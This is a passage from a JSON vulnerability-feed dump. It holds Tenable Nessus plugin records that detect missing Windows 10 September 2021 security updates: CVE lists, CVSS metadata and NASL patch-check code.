CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005569: Windows 10 version 1507 LTS September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005569.NASL", "href": "https://www.tenable.com/plugins/nessus/153372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153372);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005569\");\n script_xref(name:\"MSFT\", value:\"MS21-5005569\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005569: Windows 10 version 1507 LTS September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005569-os-build-10240-19060-0de156d8-d616-49bb-ad8d-3cf352611ca4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?322a809c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005569.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005569');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'10240',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005569])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:26", "description": "The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005566.NASL", "href": "https://www.tenable.com/plugins/nessus/153383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153383);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005566\");\n script_xref(name:\"MSFT\", value:\"MS21-5005566\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005566-os-build-18363-1801-c2535eb5-9e8a-4127-a923-0c6a643bba1d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff9fca7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005566.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005566'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005566])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:26", "description": "The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005573.NASL", "href": "https://www.tenable.com/plugins/nessus/153377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153377);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005573\");\n script_xref(name:\"MSFT\", value:\"MS21-5005573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005573-os-build-14393-4651-48853795-3857-4485-a2bf-f15b39464b41\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be42cfd3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005573.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005573');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005573])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T17:34:34", "description": "The Microsoft Open Management Infrastructure service detected on the remote host is affected by a remote code execution vulnerability due to insufficient authentication validation. An unauthenticated, remote attacker can exploit this to execute code on the remote host as root.", "cvss3": {}, "published": "2021-09-20T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure RCE (CVE-2021-38647)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2023-08-28T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_CVE-2021-38647.NBIN", "href": "https://www.tenable.com/plugins/nessus/153486", "sourceData": "Binary data omi_cve-2021-38647.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:14:06", "description": "This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-05T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_IE_SEPT_2021.NASL", "href": "https://www.tenable.com/plugins/nessus/153214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2021/09/23. Deprecated due to patch tuesday patches.\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153214);\n script_version(\"1.6\");\n 